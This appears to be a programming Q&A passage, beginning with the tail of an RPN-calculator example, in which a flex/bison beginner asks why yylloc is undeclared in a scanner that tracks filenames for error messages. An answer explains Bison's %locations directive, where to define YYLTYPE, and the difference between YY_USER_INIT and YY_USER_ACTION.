sqrt Take the square root of the current operand
div Divide current operand by the previous operand
mul Multiply previous and current operands
sub Subtract previous operand from current one
add Add current and previous operands
neg Negate current operand
and you have the new sqrt operator available.
Testing e.g. ./rpncalc 1 1 1 1 add add add sqrt yields 2.000000000, as expected.
I'm new to flex and bison so bear with me. I'm trying to use yylloc in yyerror to print out where the error occurs along with the filename. I know that this requires me to redefine YYLTPYE to include a char* filename that I can use to keep track of the filename. According to the Flex and Bison book I have, it recommends that I use the YY_USER_ACTION macro to initialize the YYLTYPE in the .l file, so I included the following in it,
#define YY_USER_ACTION yylloc.filename = filename; yylloc.hel = 0; \
yylloc.first_line = yylloc.last_line = yylineno; \
yylloc.first_column = yycolumn; yylloc.last_column = yycolumn+yyleng-1; \
yycolumn += yyleng;
but when I try to compile the project, I get the error that yylloc is undeclared.
I've tried the solution offered by Chris Dodd in this question, but it hasn't helped me to resolve the issue. Any and all help in resolving this error is much apprecaited.
Here's the full code in .l:
%option noyywrap nodefault yylineno case-insensitive
%{
#include "need.h"
#include "numbers.tab.h"
int yycolumn = 1;
#define YY_USER_ACTION yylloc.filename = filename; yylloc.hel = 0; \
yylloc.first_line = yylloc.last_line = yylineno; \
yylloc.first_column = yycolumn; yylloc.last_column = yycolumn+yyleng-1; \
yycolumn += yyleng;
%}
Integers [-]?(0|[1-9][0-9]*)
Float [.][0-9]+
Exp [eE][-]?(0|[1-9][0-9]*)
Octal [-]?(00|0[1-7][0-7]*)
Hexa [-]?(0[xX][0-9A-F]+)
tomsNotNumbers [^ \t\n\v\f\r]+
%%
{Integers}{Float}?{Exp}? {
printf("%s is a number.\n", yytext);
possibleNumbers++; // increment by 1 as an input was given -M
actualNumbers++; // increment by 1 as an input did match our pattern -M
}
{Octal} {
printf("%s is a number.\n", yytext);
possibleNumbers++; // increment by 1 as an input was given -M
actualNumbers++; // increment by 1 as an input did match our pattern -M
}
{Hexa} {
printf("%s is a number.\n", yytext);
possibleNumbers++; // increment by 1 as an input was given -M
actualNumbers++; // increment by 1 as an input did match our pattern -M
}
{tomsNotNumbers} {
printf("%s is not a number.\n", yytext);
yyerror(warning, "This isn't a number.");
possibleNumbers++; // increment by 1 as an input was given -M
failedNumbers++; // increment by 1 as the input has failed to match our patterns -M
}
[\n] /*Do nothing for newline*/
. /*Do nothing for anything else*/
%%
.y is just empty for now, only has an include for need.h and one for .tab.h
The need.h:
#include <stdlib.h>
#include <stdarg.h>
#include <string.h>
int possibleNumbers = 0;
int actualNumbers = 0;
int failedNumbers = 0;
typedef struct YYLTYPE
{
int first_line;
int first_column;
int last_line;
int last_column;
char *filename; /* use to keep track of which file we're currently in */
int hel; /* no errors = 0, warning = 1, error = 2, fatal = 3 */
} YYLTYPE;
char *name; /*using for test purposes*/
# define YYLTYPE_IS_DECLARED 1
# define YYLLOC_DEFAULT(Current, Rhs, N) \
do \
if (N) \
{ \
(Current).first_line = YYRHSLOC (Rhs, 1).first_line; \
(Current).first_column = YYRHSLOC (Rhs, 1).first_column; \
(Current).last_line = YYRHSLOC (Rhs, N).last_line; \
(Current).last_column = YYRHSLOC (Rhs, N).last_column; \
(Current).filename = YYRHSLOC (Rhs, 1).filename; \
(Current).hel = YYRHSLOC (Rhs, 1).hel; \
} \
else \
{ /* empty RHS */ \
(Current).first_line = (Current).last_line = YYRHSLOC (Rhs, 0).last_line; \
(Current).first_column = (Current).last_column = YYRHSLOC (Rhs, 0).last_column; \
(Current).filename = NULL; \
(Current).hel = 0; \
} \
while (0)
typedef enum errorSeverity
{
warning = 1, error, fatal
} errorLevel;
void yyerror(errorLevel errlvl, char *s, ...)
{
va_list ap;
va_start(ap, s);
char *errLvls[3] = {"Warning", "Error", "Fatal"};
fprintf(stderr, "%s: %s: , %n", name, errLvls[errlvl - 1], yylloc.first_line);
vfprintf(stderr, s, ap);
fprintf(stderr, "\n");
}
main(int argc, char **argv)
{
printf("argv[0] = %s, argv[1] = %s.\n", argv[0], argv[1]);
if(argc > 1)
{
if((yyin = fopen(argv[1], "r")) == NULL)
{
perror(argv[1]);
exit(1);
}
name = argv[1];
} else
name = "(stdin)";
printf("Filename1: %s", name);
yylex();
printf("Filename2: %s", name);
// print out the report. -M
printf("Out of %d possible numbers, there were %d numbers, and %d not numbers.\n", possibleNumbers, actualNumbers, failedNumbers);
}
Since yylloc is normally defined in the bison-generated parser, not having a bison input file is going to be a bit of a nuisance.
Bison will define yylloc in the generated parser, and place a declaration in the generated header file, if:
You include the directive %locations in the bison prologue, or
You reference a location (#n for some n) in any bison action.
It is generally preferred to add the directive in case there is no explicit reference to a location in any rule.
As Chris Dodd says in the linked question, it is important to include the definition of YYLTYPE before #includeing the bison-generated header file. Alternatively, you could insert the definition of the structure, or an appropriate #include, directly in the bison prologue in a %code requires section. %code requires sections are copied to the generated header, so that will obviate the need to worry about the definition in the flex file.
By the way, I think you meant to use YY_USER_INIT to initialize yylloc. The expansion of YY_USER_INIT is executed only once, before the flex scanner's own initialization. The expansion of YY_USER_ACTION is executed before every scanner action (including empty actions), and is likely to be of use to update the yylloc structure with the current token.